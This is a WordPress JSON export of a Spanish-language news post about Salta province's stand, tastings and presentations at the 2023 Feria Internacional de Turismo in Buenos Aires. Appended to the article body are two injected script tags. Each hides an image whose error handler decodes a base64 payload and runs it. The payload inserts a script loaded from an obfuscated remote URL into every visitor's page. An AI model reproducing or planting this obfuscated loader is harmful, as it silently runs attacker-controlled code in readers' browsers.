{"id":3147,"date":"2023-09-28T17:57:01","date_gmt":"2023-09-28T20:57:01","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3147"},"modified":"2025-08-14T00:07:42","modified_gmt":"2025-08-14T03:07:42","slug":"la-experiencia-salta-volvera-a-disfrutarse-en-la-feria-internacional-de-turismo-2023","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3147","title":{"rendered":"La Experiencia Salta volver\u00e1 a disfrutarse en la Feria Internacional de Turismo 2023"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#9d105b\"><em>Salta tendr\u00e1 presencia institucional y de promoci\u00f3n en la feria m\u00e1s destacada de la industria tur\u00edstica, que se realizar\u00e1 entre el 30 de septiembre y el 3 de octubre en CABA.<\/em><\/h4>\n\n\n\n<p>La Feria Internacional de Turismo 2023 contar\u00e1 con m\u00e1s de 1400 expositores nacionales y 400 internacionales; m\u00e1s de 45 pa\u00edses participantes de todas las latitudes del mundo y la representaci\u00f3n de los principales destinos argentinos.<\/p>\n\n\n\n<p>El destino Salta un nuevo a\u00f1o tendr\u00e1 presencia institucional con stand propio donde se llevar\u00e1n a cabo acciones de promociones para los miles de visitantes que concurren todos los a\u00f1os al predio Ferial de La Rural. La delegaci\u00f3n estar\u00e1 integrada por 40 empresas y 12 destinos de la provincia.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"600\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248582.jpg\" alt=\"\" class=\"wp-image-3148\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248582.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248582-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248582-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248582-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248582-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<p>Este mi\u00e9rcoles se reunieron los sectores p\u00fablico y privado de Salta en un evento Pre FIT y en el marco del D\u00eda Internacional del Turismo. El encuentro lo encabez\u00f3 el vicegobernador&nbsp;<strong>Antonio Marocco<\/strong>, junto al ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a&nbsp;<\/strong>y el presidente de la C\u00e1mara de Turismo&nbsp;<strong>Juan Lucero<\/strong>.<\/p>\n\n\n\n<p>El vicegobernador Marocco felicit\u00f3 al equipo tur\u00edstico de Salta por el D\u00eda Internacional y destac\u00f3 lo que significa esta actividad en Salta, a partir de la generaci\u00f3n de empleo directo e indirecto.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"899\" height=\"600\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248583.jpg\" alt=\"\" class=\"wp-image-3149\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248583.jpg 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248583-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248583-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248583-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248583-629x420.jpg 629w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n\n\n\n<p>El ministro de Turismo y Deportes de Salta, Mario Pe\u00f1a, afirm\u00f3 que la FIT es un espacio de oportunidades para que los empresarios salte\u00f1os comercialicen y esto impacte en m\u00e1s tur\u00edstas en Salta, adem\u00e1s para que el equipo de promoci\u00f3n nacional potencie la difusi\u00f3n del destino.<\/p>\n\n\n\n<p>Por su parte, Juan Lucero destac\u00f3 la gran participaci\u00f3n del sector privado de Salta en la FIT, siendo uno de los grupos m\u00e1s numerosos del interior lo que muestra vocaci\u00f3n y confianza en el crecimiento del destino. \u00abEn Salta somos un solo equipo, es la manera que conocemos para crecer \u00ab, se\u00f1al\u00f3.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"900\" height=\"600\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248584.jpg\" alt=\"\" class=\"wp-image-3150\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248584.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248584-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248584-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248584-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248584-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<p><strong>Activaciones y presentaciones de Salta<\/strong><\/p>\n\n\n\n<p>Durante el s\u00e1bado 30 de septiembre y el domingo 1 de octubre de 14 a 21hs, la FIT estar\u00e1 abierta al p\u00fablico en general, por lo que el equipo de promoci\u00f3n nacional del Ministerio de Turismo y Deportes, diagram\u00f3 una serie de activaciones dirigidas al consumidor final para que Salta sea uno de los destinos elegidos en las pr\u00f3ximas vacaciones.<\/p>\n\n\n\n<p>El s\u00e1bado 30 de 15 a 15.45 se ofrecer\u00e1 un maridaje salte\u00f1o de vinos y empandas; a las 18, se festejar\u00e1n los 70 a\u00f1os de la Pe\u00f1a Balderrama en el escenario de la regi\u00f3n Norte con la actuaci\u00f3n de Los Guitarreros. En el resto de los horarios, los visitantes de la feria podr\u00e1n disfrutar de juegos y premios en el stand que estar\u00e1 ubicado dentro del sector para el Norte argentino.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"899\" height=\"600\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248585.jpg\" alt=\"\" class=\"wp-image-3151\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248585.jpg 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248585-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248585-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248585-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248585-629x420.jpg 629w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n\n\n\n<p>El lunes 2 y martes 3 de octubre, FIT abre sus puertas exclusivamente para profesionales del sector, de 10 a 19hs. Sumando distintas opciones de comercializaci\u00f3n y nuevas oportunidades. En este marco, se organizaron presentaciones para exponer ante p\u00fablico especializado y prensa tur\u00edstica el trabajo que desarrolla la provincia, municipios y el sector privado.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"899\" height=\"600\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248586.jpg\" alt=\"\" class=\"wp-image-3152\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248586.jpg 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248586-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248586-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248586-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/1000248586-629x420.jpg 629w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n\n\n\n<p>El lunes 2, se presentar\u00e1n Los Imperdibles de Salta (destinos tur\u00edsticos) en el sal\u00f3n Ceibo. A las 17 del mismo d\u00eda, se presentar\u00e1 la Semana del Torront\u00e9s de Altura que se vivir\u00e1 durante octubre en la provincia.<\/p>\n\n\n\n<p>El martes 3 a las 12, ser\u00e1 el turno de la exposici\u00f3n \u201cSalta Argentina, hacia un destino sin huellas\u201d en la Sala CFT1. A las 13, se ofrecer\u00e1 un agasajo a la prensa especializada.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Salta tendr\u00e1 presencia institucional y de promoci\u00f3n en la feria m\u00e1s destacada de la industria tur\u00edstica, que se realizar\u00e1 entre el 30 de septiembre y el 3 de octubre en CABA. La Feria Internacional de Turismo 2023 contar\u00e1 con m\u00e1s de 1400 expositores nacionales y 400 internacionales; m\u00e1s de 45 pa\u00edses participantes de todas las [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3150,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-3147","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3147"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3147"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3147\/revisions"}],"predecessor-version":[{"id":6953,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3147\/revisions\/6953"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3150"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3147"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3147"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3147"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}